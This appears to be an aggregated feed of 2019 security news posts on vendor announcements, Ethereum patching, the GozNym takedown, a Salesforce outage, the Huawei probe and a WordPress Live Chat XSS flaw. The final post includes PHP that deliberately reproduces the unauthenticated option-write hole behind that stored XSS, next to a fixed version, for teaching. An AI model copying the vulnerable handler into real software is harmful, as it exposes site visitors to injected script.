Checkmarx, the Software Exposure Platform for the enterprise, has deployed CxSAST on Project Hosts’ Federal Private Cloud (FPC) FedRAMP-authorized Platform-as-a-Service (PaaS). This deployment facilitates Federal agencies to grant a FedRAMP Moderate or DOD Impact Level 5 (IL5) Authority to Operate (ATO) for a cloud deployment of the Checkmarx CxSAST solution. By being deployed on Project Hosts’ Federal Private Cloud (FPC) FedRAMP-authorized Platform-as-a-Service (PaaS), Checkmarx inherits a vast majority of the controls required for FedRAMP and … More

The post Checkmarx deploys CxSAST on Project Hosts’ FPC FedRAMP-authorized PaaS appeared first on Help Net Security.

ExtraHop for IBM QRadar part of collaborative development to stay ahead of evolving threats

ExtraHop, provider of enterprise cyber analytics from the inside out, launched the ExtraHop for IBM QRadar app, which integrates with IBM Security Intelligence technology to stream accurate, contextual network behavioral detections into the QRadar SIEM. With Reveal(x) detections in QRadar, organizations have a complete picture of suspicious or anomalous behavior on their network, as well as the ability to perform rapid, guided investigations. This bi-directional integration lets analysts move back to ExtraHop to explore forensic … More

The post ExtraHop for IBM QRadar part of collaborative development to stay ahead of evolving threats appeared first on Help Net Security.

HSB Farm Cyber Insurance solution to protect farmers from hackers and malware

Hartford Steam Boiler (HSB), part of Munich Re, announced a new HSB Farm Cyber Insurance solution that helps protect farmers and farm technology from hackers, malware and other cyber attacks. “Innovative technologies are being deployed across the farming industry and data and information systems are helping farmers better understand how to maximize efficiency and production,” said James Hajjar, who leads the cyber practice for HSB’s reinsurance clients. “With this new reliance on digital information and … More

The post HSB Farm Cyber Insurance solution to protect farmers from hackers and malware appeared first on Help Net Security.

Venafi and GlobalSign partnership and integration to address DevOps certificate challenges

Venafi, the leading provider of machine identity protection, and GMO GlobalSign, a global Certificate Authority and leading provider of identity and security solutions for the Internet of Things (IoT), announced an expanded technology partnership and integration that seamlessly addresses DevOps certificate challenges. Additionally, Venafi Cloud is now fully integrated with GlobalSign’s high-performance PKI solutions for enterprises. The integration of Venafi Cloud and GlobalSign PKI for DevOps provides DevOps teams with quick, high-speed access to trusted … More

The post Venafi and GlobalSign partnership and integration to address DevOps certificate challenges appeared first on Help Net Security.

FlexiCapture Cloud now enhanced with REST API and Real-Time Capture

ABBYY, a global leader in Content IQ technologies and solutions, announced a series of innovations to ABBYY FlexiCapture, an AI-enabled enterprise platform to automate document processing workflows and convert unstructured content into structured data for better business outcomes. The updates include the launch of the ABBYY FlexiCapture Cloud REST API (Representational State Transfer Application Programming Interface) and the introduction of the new Real-Time Capture technology for real-time document processing in the cloud. As companies strive … More

The post FlexiCapture Cloud now enhanced with REST API and Real-Time Capture appeared first on Help Net Security.

At-Bay launches excess cyber insurance policy for clients up to $5Bn revenue

At-Bay launched an excess cyber insurance policy for clients across all industry classes. At-Bay developed this product to fulfill broker demand for access to the At-Bay Security Team for organizations with insurance towers. The At-Bay Security Team provides insureds with ongoing vulnerability scanning, threat monitoring, and 24/7 support to help prevent loss. With the new product launch, At-Bay has made these security services available to Excess clients. “We wanted to create an excess program for … More

The post At-Bay launches excess cyber insurance policy for clients up to $5Bn revenue appeared first on Help Net Security.

HITRUST supports Texas legislation to create a Privacy Protection Advisory Council

HITRUST, a leading data protection standards development and certification organization, supports legislation that would create a council to study privacy laws and how privacy practices for Texas businesses could be strengthened through potential legislation. Representative Giovanni Capriglione’s (Southlake) House Bill 4390, passed by the Texas House unanimously on May 7, 2019 and would create the Texas Privacy Protection Advisory Council. The Council would study and evaluate Texas laws and other privacy laws in order to … More

The post HITRUST supports Texas legislation to create a Privacy Protection Advisory Council appeared first on Help Net Security.

Weekly Update 139

Per the beginning of the video, it's out late, I'm jet lagged, all my clothes are dirty and I've had to raid the conference swag cupboard to even find a clean t-shirt. But be that as it may, I'm yet to miss one of these weekly vids in the 2 and a half years I've been doing them and I'm not going to start now! So with that very short intro done, here's this week's and I'll try and be a little more on the ball for the next one.


  1. Google is having some issues with the U2F keys they recommend for their Advanced Protection Program (but seriously, this is a pretty minor issue)
  2. I'm definitely still recommending this approach for locking down Google accounts (that's my piece from November on how to get it all set up)
  3. Forbes had some Magecart script running on their site (interesting breakdown by @bad_packets)
  4. Let's Encrypt's CT log is now up and running (with support from Sectigo too so kudos to them for that, it's a very different approach to the old Comodo)
  5. I'm up for some European Blogger Awards again! (I'd love your votes folks 😎)
  6. Twilio is sponsoring my blog again this week (check how to implement 2FA in your app with Authy)

Ireland And Its Evolving Cybersecurity Issues

Ireland in 2018 experienced a huge decline in malware infections, and especially in ransomware cases, compared to 2017. The European country of almost 5 million people is mirroring the global trend in cybersecurity issues, as cybercriminals are heavily transitioning from disruptive and destructive ransomware to silent yet very profitable phishing and cryptojacking. Ireland recorded a monthly infection rate of just 1.26% in 2018, one of the lowest in the European region and one of the lowest globally.

This is a sharp contrast to 2017, when millions of computers worldwide were heavily infected by ransomware, most notably WannaCry and NotPetya. Cryptojacking is easy to deploy and very difficult to detect, as it is basically a program that consumes CPU/GPU resources like any other program on a computing device. But the consumed CPU/GPU resources do not produce a tangible output like a typical benign program; they are instead spent computing hashes in an attempt to mine cryptocurrency.

“While we have seen a welcome drop in ransomware and malware attacks, it would be a mistake to assume the level of the cyber threat to Irish organizations has also decreased. We are seeing major behavioral change amongst criminal hackers, who want access to a victim’s computer and an organization’s network to access data, but also use their computing power to mine for cryptocurrency. This is about playing the long game and exploiting people’s lack of training and understanding when it comes to cybercrime. Microsoft’s analysts predict phishing will continue to be an issue for the foreseeable future for that reason,” explained Des Ryan, Microsoft Ireland’s Solutions Director.

To add insult to injury, Microsoft underscored that many private and public entities in the country lack adequate staff training when it comes to cybersecurity. The vulnerable companies also practice lax IT security protocols, a trait that allows any incident, once something goes wrong, to escalate rapidly.


The post Ireland And Its Evolving Cybersecurity Issues appeared first on .

Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk

Security researchers from SRLabs have published a report analyzing the risks to the Ethereum network caused by unpatched Ethereum clients.

Researchers at SRLabs published a report, based on collected data, revealing that a large number of nodes running the popular clients Parity and Geth are still unpatched. The experts found that the Ethereum clients and their users remained exposed for “extended periods of time” after security patches had been released.

“SRLabs research suggests that security vulnerabilities remain unpatched for many Ethereum blockchain participants for extended periods of time, putting the blockchain ecosystem at risk.” reads the report.

Experts pointed out that an attacker who controls more than 51% of the computational power in the Ethereum network can double-spend coins, undermining trust in the ecosystem. An attacker who can crash a large number of nodes could reach that 51% share of the network more easily.

For that reason, denial-of-service issues are classified as high severity in cryptocurrency networks: attackers can leverage them to reduce the amount of computational power needed to perform a 51% attack.

In February, SRLabs reported a vulnerability in the Parity client that could be exploited to remotely crash Parity Ethereum nodes running versions prior to 2.2.10.

“According to our collected data, only two thirds of nodes have been patched so far. Shortly after we reported this vulnerability, Parity released a security alert, urging participants to update their nodes.” continues the report.

A month after the flaw was patched, the experts found that around 40% of all scanned Parity Ethereum nodes remained unpatched. Another patch, released on Mar 2, 2019, was installed by around 70% of Parity Ethereum nodes, leaving the remaining 30% exposed.

The situation is worse if we consider that 7 percent of Parity nodes still run a version vulnerable to a critical consensus vulnerability patched in July 2018.

The following graph shows the percentage of unpatched Ethereum nodes in 2019 that decreases slowly over time.

[Graph: percentage of unpatched Ethereum nodes, 2019]

Researchers explained that the Parity Ethereum client has an automated update process, but it suffers from high complexity and some updates are left out.

The report confirms that patch management for the Geth client, which does not include an auto-update feature, is even worse: Geth clients remained unpatched for longer periods of time.

“According to their announced headers, around 44% of the Geth nodes visible at were below version v.1.8.20, a security-critical update, released two months before our measurement,” continues the SRLabs team.

Experts conclude that the lack of basic patch hygiene undermines the security of the entire Ethereum ecosystem.
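As an added illustration (not SRLabs’ code) of the measurement behind the percentages above, the following checker classifies nodes from the client identifier they announce against the patched versions named in the report. The identifier formats for Geth and Parity-Ethereum and the sample node list are assumptions of this example.

```python
"""Classify Ethereum nodes as patched or unpatched from the client version
string they announce, the kind of measurement behind the percentages above.

Added example, not SRLabs' tooling. Assumed identifier formats:
  Geth:   "Geth/v1.8.20-stable-24d727b6/linux-amd64/go1.11.2"
  Parity: "Parity-Ethereum//v2.2.10-stable-3ed1d45-20190215/x86_64-linux-gnu/rustc1.32.0"
The sample node list below is constructed for this example.
"""
import re
from collections import Counter

# Lowest versions that carry the fixes the report refers to: Parity below
# 2.2.10 could be crashed remotely, Geth below v1.8.20 lacks a
# security-critical update. Thresholds from the report; formats assumed.
MIN_PATCHED = {
    "geth": (1, 8, 20),
    "parity": (2, 2, 10),
}

_VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)")


def parse_client(identifier):
    """Return (client, (major, minor, patch)); client or version is None if unrecognised."""
    parts = identifier.split("/")
    name = parts[0].strip().lower()
    if name.startswith("geth"):
        client = "geth"
    elif name.startswith("parity"):
        client = "parity"
    else:
        return None, None
    # The first component after the name that looks like x.y.z is the version.
    # Parity announces a double slash, which yields an empty component to skip.
    for part in parts[1:]:
        match = _VERSION_RE.match(part.strip())
        if match:
            return client, tuple(int(g) for g in match.groups())
    return client, None


def is_patched(identifier):
    """True or False for a known client with a parsable version, None otherwise."""
    client, version = parse_client(identifier)
    if client is None or version is None:
        return None
    # Tuple comparison orders (2, 3, 2) above (2, 2, 10), unlike a string compare.
    return version >= MIN_PATCHED[client]


def summarise(identifiers):
    """Per-client patched/unpatched counts plus the number of unclassifiable nodes."""
    counts = {client: Counter() for client in MIN_PATCHED}
    unknown = 0
    for ident in identifiers:
        client, _ = parse_client(ident)
        status = is_patched(ident)
        if status is None:
            unknown += 1
            continue
        counts[client]["patched" if status else "unpatched"] += 1
    return counts, unknown


def unpatched_share(identifiers, client):
    """Fraction of a client's classifiable nodes that are below the patched version."""
    counts, _ = summarise(identifiers)
    total = counts[client]["patched"] + counts[client]["unpatched"]
    return counts[client]["unpatched"] / total if total else 0.0


# Constructed sample of announced identifiers (build hashes are placeholders).
SAMPLE_NODES = [
    "Geth/v1.8.23-stable-aaaaaaaa/linux-amd64/go1.11.5",
    "Geth/v1.8.17-stable-bbbbbbbb/linux-amd64/go1.11",
    "Geth/v1.8.20-stable-cccccccc/linux-amd64/go1.11.2",
    "Parity-Ethereum//v2.2.11-stable-dddddddd-20190301/x86_64-linux-gnu/rustc1.32.0",
    "Parity-Ethereum//v2.2.9-stable-eeeeeeee-20190201/x86_64-linux-gnu/rustc1.32.0",
    "Parity-Ethereum//v2.3.2-beta-ffffffff-20190301/x86_64-linux-gnu/rustc1.32.0",
    "Parity-Ethereum//v2.1.10-stable-00000000-20190101/x86_64-linux-gnu/rustc1.31.0",
    "OtherClient/v0.1.0/linux",
]

if __name__ == "__main__":
    # Caveat: headers are self-reported, so a node can claim any version;
    # treat the result as a lower bound on exposure, not proof of patching.
    counts, unknown = summarise(SAMPLE_NODES)
    for client in MIN_PATCHED:
        share = unpatched_share(SAMPLE_NODES, client)
        print(client, dict(counts[client]), f"unpatched share {share:.0%}")
    print("unclassified nodes:", unknown)
```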


Pierluigi Paganini

(SecurityAffairs – patch management, hacking)

The post Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk appeared first on Security Affairs.

Week in review: New Intel CPU vulnerabilities, SharePoint servers under attack

Here’s an overview of some of last week’s most interesting news and articles: High-risk vulnerability in Cisco’s secure boot process impacts millions of devices Red Balloon Security has discovered a high-risk vulnerability in Cisco’s secure boot process which impacts a wide range of Cisco products in use among enterprise and government networks, including routers, switches and firewalls. Tips to spring clean your company’s social media and stay protected Spring is a great time for organizations … More

The post Week in review: New Intel CPU vulnerabilities, SharePoint servers under attack appeared first on Help Net Security.

Law Enforcement Operation Dismantles GozNym Banking Malware

An international law enforcement operation has led to the dismantling of the global cybercrime network that used the GozNym banking malware to steal money from bank accounts across the world.

TechCrunch reports, “Europol and the U.S. Justice Department, with help from six other countries, have disrupted and dismantled the GozNym malware, which they say stole more than $100 million from bank accounts since it first emerged.”

Prosecutors stated, at a press conference held in The Hague, that ten defendants in five countries have been charged with using the GozNym malware to steal money from over 41,000 victims, including businesses and financial institutions. Of these ten people, five have been arrested in Moldova, Ukraine, Bulgaria, and Russia, while the remaining five, all Russians, are on the run. The leader of the cybercrime network and his technical assistant are being prosecuted in Georgia.

TechCrunch security editor Zack Whittaker writes, “All were charged with conspiracy to commit computer fraud, conspiracy to commit wire and bank fraud and conspiracy to commit money laundering. An eleventh member of the conspiracy, Krasimir Nikolov, was previously charged and extradited to the U.S. in 2016 and pleaded guilty in April in his role in the GozNym malware network.”

He adds, “The takedown was described as an “unprecedented international effort” by Scott Brady, U.S. attorney for Western Philadelphia — where a grand jury indicted the defendants — at the press conference announcing the charges.”

The victims of the GozNym attacks have not been named, but it’s reported that in the U.S. at least 11 businesses, including two law firms and a casino, plus a church, have been impacted.

The banking malware GozNym was developed from two existing malware families, Gozi and Nymaim, and spread across the U.S., Germany, Poland and Canada. It first emerged in 2016 and has hit dozens of banks and credit unions since then. The leader of the cybercrime network behind GozNym had built it from the code of the two malware families, both of which had their source code leaked years earlier. He then recruited accomplices and advertised GozNym on Russian-speaking forums.

The TechCrunch report explains how GozNym, which is described as malware “as a service”, works: “The malware used encryption and other obfuscation techniques to avoid detection by antivirus tools. Then, spammers are said to have sent hundreds of thousands of phishing emails to infect staff at businesses and banks. After the malware infected its victim computers, the malware would steal the passwords control of bank accounts, which the criminals would later log in and cash out.”

The report further says that according to prosecutors, the GozNym network was “hosted and operated through a bulletproof service, a domain and web hosting known for lax attitudes toward cybercrime and favored by criminals.”

An administrator of the “Avalanche” network, an infrastructure platform which provided services to over 200 cybercriminals and which was dismantled in 2016 during a German-led operation, had also provided bulletproof hosting services to the GozNym network. This administrator would also face prosecution in Ukraine (where his apartment is located) for his role in providing bulletproof hosting services to the GozNym network.


The post Law Enforcement Operation Dismantles GozNym Banking Malware appeared first on .

Security Affairs newsletter Round 214 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy


Hacking the ‘Unhackable’ eyeDisk USB stick
Security breach suffered by credit bureau Equifax has cost $1.4 Billion
Turkish Personal Data Protection Authority fined Facebook for Photo API bug
CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8
Expert discovered how to brick all Samsung mobile phones
Facebook sues data analytics firm Rankwave over alleged data misuse
Over 10k+ GPS trackers could be abused to spy on individuals in the UK
Pacha Group declares war on rival crypto mining hacking groups
Reading the Yoroi Cyber Security Annual Report 2018
Malware Training Sets: FollowUP
Millions of computers powered by Intel chips are affected by MDS flaws
North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal
Thrangrycat flaw could allow compromising millions of Cisco devices
Unprotected DB exposed PII belonging to nearly 90% of Panama citizens
WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware
Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder
Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks
SAP Security Patch Day for May 2019 fixes many missing authorization checks
Twitter inadvertently collected and shared iOS location data
A flaw in Google Titan Security Keys exposes users to Bluetooth attacks
A joint operation by international police dismantled GozNym gang
BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor
Google ‘0Day In the Wild’ project tracks zero-days exploited in the wild
Magecart hackers inject card Skimmer in Forbes Subscription Site
Microsoft renewed its Attack Surface Analyzer, version 2.0 is online
Past, present, and future of the Dark Web
The stealthy email stealer in the TA505 hacker group’s arsenal
A flaw in Slack could allow hackers to steal, manipulate downloaded files
Chinese state-sponsored hackers breached TeamViewer in 2016
Cisco addressed a critical flaw in networks management tool Prime Infrastructure
Stack Overflow Q&A platform announced a data breach
XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites
Dozens of Linksys router models leak data useful for hackers
Facebook banned Archimedes Group, misinformation made in Israel
Number of hacktivist attacks declined by 95 percent since 2015
Unistellar attackers already wiped over 12,000 MongoDB databases

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 214 – News of the week appeared first on Security Affairs.

Salesforce faced one of its biggest service disruptions ever

Salesforce is facing a huge outage: it shut down a good portion of its infrastructure after a change to the production environment went wrong.

A change in the production environment is the root cause of the broad outage suffered by Salesforce.

The service disruption originated in its Pardot B2B marketing automation system: the cloud CRM company’s change broke access privilege settings across organizations and gave users access to all of their respective company’s files.

“One of our projects had all its profiles modified to enable modify all, allowing all users access to all data.” reported a user on Reddit.

In response to the incident, Salesforce blocked all access to roughly a hundred cloud instances that host Pardot customers, which also cut off other customers hosted on the same instances even if they were not using Pardot.

Salesforce customers have been unable to access the service since 09:56 PDT (16:56 UTC) on Friday.

“The deployment of a database script resulted in granting users broader data access than intended,” reads a note published by the company. “To protect our customers, we have blocked access to all instances that contain affected customers until we can complete the removal of the inadvertent permissions in the affected customer orgs.”


Parker Harris, Salesforce co-founder and CTO, also published a public message on the incident.

A few hours ago, Salesforce informed its users that it had restored access to most of its services, meaning users experienced at least 15 hours of service disruption. Unfortunately, some organizations may still face problems: according to the latest notice issued by the CRM firm, administrators will have to repair user account permissions manually.

“We have restored administrators’ access to all orgs affected by the recent permissions issue and have prepared a set of instructions for admins that may need guidance on how to manually restore user permissions. We have updated the instructions to include guidance for Field Service Lightning administrators.” states the company. “Those instructions can be found in this Known Issue article: In parallel, we are working on an automated provisioning fix to allow us to restore user permissions to where they were before the incident occurred.”

The company warns that a limited number of admins may still be experiencing issues such as logging in to their organizations or modifying permissions.


Pierluigi Paganini

(SecurityAffairs – Salesforce, outage)

The post Salesforce faced one of its biggest service disruptions ever appeared first on Security Affairs.

Fraudulently Acquired IPv4 Addresses Revoked by ARIN

The American Registry for Internet Numbers, Ltd. (ARIN) won a legal case against a multi-year scheme designed to defraud the Internet community of approximately 735,000 IPv4 addresses. John Curran, President and CEO of ARIN, announced that the fraud had been discovered through an internal due diligence process.

ARIN is a non-profit organization responsible for distributing Internet number resources in the United States, Canada and parts of the Caribbean. The emerging IPv4 address transfer market and growing demand have led to new attempts to obtain IPv4 addresses fraudulently.

This is the first arbitration under the ARIN Registration Services Agreement, with related proceedings in the US District Court for the Eastern District of Virginia. ARIN was able to prove an elaborate scheme to fraudulently acquire resources, including many notarized affidavits sent to ARIN. “A company in South Carolina obtained and utilized 11 shelf companies across the United States, and intentionally created false aliases purporting to be officers of those companies, to induce ARIN into issuing the fraudulently sought IPv4 resources and approving related transfers and reassignments of these addresses. The defrauding party was monetizing the assets obtained in the transfer market, and obtained resources under ARIN’s waiting list process.” (ARIN Press Release).

The defrauding entity took an aggressive stance after ARIN asked it to produce certain documents and explain its conduct: it filed a motion for a temporary restraining order and preliminary injunction against ARIN in the US District Court and requested a hearing the following morning, just before Christmas. “The aggressive posture was taken after ARIN indicated its intent to revoke addresses, while permitting the defrauding entity to renumber to allow existing bona fide customers not to have service interrupted,” ARIN’s General Counsel told CircleID. “The litigation was filed against ARIN to seek an injunction to stop ARIN from revoking and enter arbitration. Some addresses were transferred for money prior to that demand, others were pending transfer and were never transferred due to ARIN investigation.”

Some fraudulently obtained addresses were transferred to third parties; however, ARIN made no effort to pursue the parties that received the completed transfers, ARIN’s General Counsel told CircleID. The reason: “(a) addresses were in another RIR service region (e.g. RIPE NCC and APNIC) and (b) ARIN did not see any evidence they knew of or participated in the fraud. In other words, they appeared to be bona fide 3rd parties.”

On May 1, 2019, ARIN obtained an arbitration award that included the revocation of all fraudulently obtained resources and $350,000 to ARIN for its legal fees.

UPDATE May 15, 2019: In a statement titled “Charleston Man and Business Indicted in Federal Court in Over $9M Fraud”, the United States Department of Justice announced that Amir Golestan, 36, of Charleston, and Micfo, LLC, were charged in federal court in a twenty-count indictment for wire fraud, with each count punishable by up to 20 years’ imprisonment.


The post Fraudulently Acquired IPv4 Addresses Revoked by ARIN appeared first on .

Dutch intelligence investigate alleged Huawei ‘backdoor’

Dutch intelligence services are probing Huawei for possibly spying for the Chinese government by using a “back door” in equipment of major telecoms firms.


Dutch intelligence shares the concerns raised by other western governments about the risks of involving the Chinese telco giant in the creation of the new 5G mobile phone infrastructure.

Since 2018, the US Government has urged its allies to exclude Huawei equipment from critical infrastructure and 5G architectures.

According to Dutch newspaper De Volkskrant, the probe into Huawei is being led by the Dutch intelligence agency, AIVD.

The newspaper, citing intelligence sources, revealed that Huawei allegedly had access to the data of customers of major telecoms firms in the country, including Vodafone, KPN and T-Mobile. In April, KPN announced a partnership with Huawei to update its 4G network.

“The report comes at a crucial time in the Netherlands, with Dutch Prime Minister Mark Rutte expected to make an imminent decision on the extent of Huawei’s involvement in the country’s 5G infrastructure.” reported the Telegraph.

AIVD did not comment on the report; its spokesman Hilbert Bredemeijer explained that the spy agency “does not comment on possible individual cases.”


Huawei continues to deny the accusations of cyber espionage, and again stressed that it is a private company not working for the Chinese intelligence apparatus.

“We do not respond to stories based on anonymous sources or speculation. We have been aware of a Task Force led by the NCTV (Ministry of Justice & Security) for some time to investigate the risks involved in the construction and use of 5G. That was previously announced in a letter from Minister Grapperhaus.” a Huawei spokesperson said.

“It is also known that the three major telecom parties are participating in the risk analysis of the vulnerability of 5G telecommunication networks. This involves looking at what measures are needed to minimize risks. We are in favor of taking general measures that can increase the resilience of telecommunications networks and that apply equally to all relevant parties. We look forward to the results of this report with confidence.”

The Dutch probe is part of a dispute between China and the United States over global trade and cyber espionage.


Pierluigi Paganini

(SecurityAffairs – 5G, Dutch intelligence services)

The post Dutch intelligence investigate alleged Huawei ‘backdoor’ appeared first on Security Affairs.

Nothing but the truth: the legacy of George Orwell’s Nineteen Eighty-Four

Every generation turns to it in times of political turmoil, and this extract from a new book about the novel examines its relevance in the age of fake news and Trump


December 1948. A man sits at a typewriter, in bed, on a remote island, fighting to complete the book that means more to him than any other. He is terribly ill. The book will be finished and, a year or so later, so will the man.

January 2017. Another man stands before a crowd, which is not as large as he would like, in Washington DC, taking the oath of office as the 45th president of the United States of America. His press secretary says that it was the “largest audience to ever witness an inauguration – period – both in person and around the globe”. Asked to justify such a preposterous lie, the president’s adviser describes the statement as “alternative facts”. Over the next four days, US sales of the dead man’s book will rocket by almost 10,000%, making it a No 1 bestseller.

Continue reading...

May I have a word about… Pegasus spyware | Jonathan Bouquet

Is the powerful virus that infected WhatsApp a flying horse or a Trojan horse? Don’t ask the woman who developed it

The unsavoury revelations about the hacking of WhatsApp by software developed by Israeli company, NSO Group, raised some interesting imagery. NSO has developed a powerful smartphone virus called Pegasus, described by NSO co-founder Shalev Hulio as the company’s Trojan horse that could be sent “flying through the air” to infiltrate devices.

Right, let’s get this straight. Pegasus was the son of mortal Medusa and Poseidon, god of the sea. Pegasus and his brother Chrysaor were born from the blood of their beheaded mother, who was tricked and killed by Perseus. Pegasus was represented as a kind-hearted, gentle creature, somewhat naive but always eager to help.

Continue reading...

Number of hacktivist attacks declined by 95 percent since 2015

According to a study conducted by IBM, the number of hacktivist attacks that caused quantifiable damage has declined by 95 percent since 2015.

Even though in Italy the cells of the Anonymous collective are still very active, the overall number of hacktivist attacks that caused quantifiable damage to the victim has declined by 95 percent since 2015.

Researchers analyzed data collected by IBM’s X-Force threat intelligence unit between 2015 and 2019. Collected information shows a drop in the hacktivist attacks from 35 in 2015 to only 2 attacks in 2018.


However, IBM experts only collected data on hacktivist attacks that resulted in quantifiable damage.

Most of the hacktivist attacks carried out between 2015 and 2018 were attributed to Anonymous (45%), followed at a distance by Lizard Squad (9%), and DownSec and New World Hackers (4% each).


“The “IBM X-Force Threat Intelligence Index 2019” highlighted troubling trends in the cybersecurity landscape, including a rise in vulnerability reporting, cryptojacking attacks and attacks on critical infrastructure organizations.” reads a blog post published by IBM. “Yet amid all the concern, there is one threat trend that our data suggests has been on the decline: hacktivism — the subversive use of internet-connected devices and networks to promote a political or social agenda.”

The experts believe that the decline in the number of attacks carried out by hacktivists is caused by two major factors: a drop in attacks launched by Anonymous, and the intensification of the operations conducted by law enforcement that led to the arrests of hacktivists.

Since 2010, Anonymous has been one of the most active hacktivist collectives in the world, reaching a peak of activity in early- to mid-2016.

At the time, Anonymous hit several high-profile organizations, but according to IBM the group started to decline “possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus.”

X-Force data shows only eight Anonymous attacks in 2015 and 2016, and only one in 2018.

Arrests and legal warnings targeting hacktivists have had a strong deterrent effect. According to IBM, law enforcement agencies in the U.S., U.K. and Turkey have arrested at least 62 hacktivists since 2011, and the actual number could be greater.

“Three of the arrested hacktivists received sentences in 2018 and 2019, all with prison time of three years or greater, including one with a 10-year prison sentence.” continues IBM.

Alleged Anonymous member Martin Gottesfeld was accused of launching DDoS attacks in 2014 against two US healthcare organizations, Boston Children’s Hospital and the Wayside Youth and Family Support Network.

In January, the hacktivist was sentenced to 121 months in prison, and the judge ordered him to pay nearly $443,000 in damages.

“Where are hacktivist attacks likely to go from here? We are reluctant to say that the era of hacktivism has come to an end. Acute social justice issues, greater organizational capabilities among hacktivist groups and a stronger shift to areas that lay beyond the reach of law enforcement all have the potential to dramatically change the face of hacktivism in a relatively short period of time.” concludes IBM. “More likely than not, we are experiencing a lull in hacktivist activity rather than a conclusion.”


Pierluigi Paganini

(SecurityAffairs – hacktivist attacks, hacking)

The post Number of hacktivist attacks declined by 95 percent since 2015 appeared first on Security Affairs.

Hackers Inject Scripts in WordPress Live Chat Plugin

Site administrators using WP Live Chat Support for WordPress are advised to upgrade the plugin to the latest version to close a persistent cross-site scripting (XSS) vulnerability that can be exploited without any authentication.

Installed on more than 60,000 websites, the plugin is presented as a free, full-featured customer engagement and live chat solution.

The danger of automatic attacks

Sucuri researchers discovered that versions of the plug-in earlier than 8.0.27 are susceptible to persistent XSS issues that can be exploited remotely by a hacker who does not have an account on the affected site.

Because no authentication is needed, attackers can automate the attack and hit many sites at once; combined with the plugin’s popularity and the little effort required, that makes it an attractive target for mass exploitation.

XSS is a serious class of flaw: it lets an attacker place malicious code in a website or web application, which can then be used to compromise visitors’ accounts or serve them modified pages.

XSS is persistent when the malicious code is added to content stored on the server, for instance user comments. When a user loads the infected page, the malicious code is executed by the browser and the attacker’s instructions run in the victim’s session.

Sucuri’s write-up explains that the vulnerability stems from an unprotected “admin_init” hook, a common attack vector in WordPress plugins.

The researchers say that the wplc_head_basic function did not use the appropriate authorization controls to update the plug-in’s settings.

“Because the ‘admin_init’ hooks can be called by visiting /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, an unauthenticated attacker can use these endpoints to update the ‘wplc_custom_js’ option arbitrarily,” Castro details.

The content of that option is included on every page on which the live chat support loads, so attackers who reach a vulnerable site can inject JavaScript into many pages at once.

Sucuri informed the plugin’s developers on April 30, and the corrected version, 8.0.27, was released on Wednesday.
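To make the mechanism concrete, here is an added illustration in PHP (my own code, not the plugin’s): a settings handler that writes the wplc_custom_js option the way an unprotected admin_init callback would, beside a hardened version. The function names, nonce action and settings page slug are hypothetical; the option name and the admin-post.php/admin-ajax.php endpoints are the ones named above.

```php
<?php
/*
 * Added illustration, not WP Live Chat Support's actual code: the
 * "unprotected admin_init hook" pattern described above, next to a
 * hardened version. example_* names and the settings page slug are
 * hypothetical; wplc_custom_js is the option named in the advisory.
 */

/* ---- Vulnerable pattern ------------------------------------------------
 * admin_init fires for every request that loads wp-admin/admin-post.php or
 * wp-admin/admin-ajax.php, and both files serve anonymous visitors too.
 * A callback hung off admin_init therefore runs for unauthenticated POSTs;
 * if it writes an option without checking who is asking, any visitor can
 * overwrite that option.
 */
function example_vulnerable_save_custom_js() {
    // Bug: no capability check and no nonce. A POST to
    // /wp-admin/admin-post.php with wplc_custom_js=<payload> is enough.
    if ( isset( $_POST['wplc_custom_js'] ) ) {
        update_option( 'wplc_custom_js', wp_unslash( $_POST['wplc_custom_js'] ) );
    }
}
add_action( 'admin_init', 'example_vulnerable_save_custom_js' );

/* The stored value is later printed into every front-end page, which is
 * what turns the missing authorization check into persistent XSS. */
function example_print_custom_js() {
    $js = get_option( 'wplc_custom_js', '' );
    if ( '' !== $js ) {
        // Intentionally unescaped: the feature exists to run admin-supplied JS,
        // so the only real control is who may write the option.
        echo "<script>\n" . $js . "\n</script>\n";
    }
}
add_action( 'wp_head', 'example_print_custom_js' );

/* ---- Hardened pattern ---------------------------------------------------
 * Three changes: (1) hang the handler off admin_post_{action}, which only
 * fires for logged-in users (the anonymous twin is admin_post_nopriv_*);
 * (2) require the manage_options capability, the authorization check that
 * was missing; (3) verify a nonce so a logged-in admin cannot be CSRF'd
 * into saving attacker-chosen script.
 */
function example_hardened_save_custom_js() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Sorry, you are not allowed to change these settings.', 403 );
    }
    // Dies with a 403 if the nonce is missing, forged or stale.
    check_admin_referer( 'example_save_custom_js', 'example_nonce' );

    $js = isset( $_POST['wplc_custom_js'] ) ? wp_unslash( $_POST['wplc_custom_js'] ) : '';
    update_option( 'wplc_custom_js', $js );

    wp_safe_redirect( admin_url( 'options-general.php?page=example-live-chat&updated=1' ) );
    exit;
}
add_action( 'admin_post_example_save_custom_js', 'example_hardened_save_custom_js' );

/* The settings form that targets the hardened handler. */
function example_render_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="example_save_custom_js">
        <?php wp_nonce_field( 'example_save_custom_js', 'example_nonce' ); ?>
        <textarea name="wplc_custom_js"><?php echo esc_textarea( get_option( 'wplc_custom_js', '' ) ); ?></textarea>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}
```

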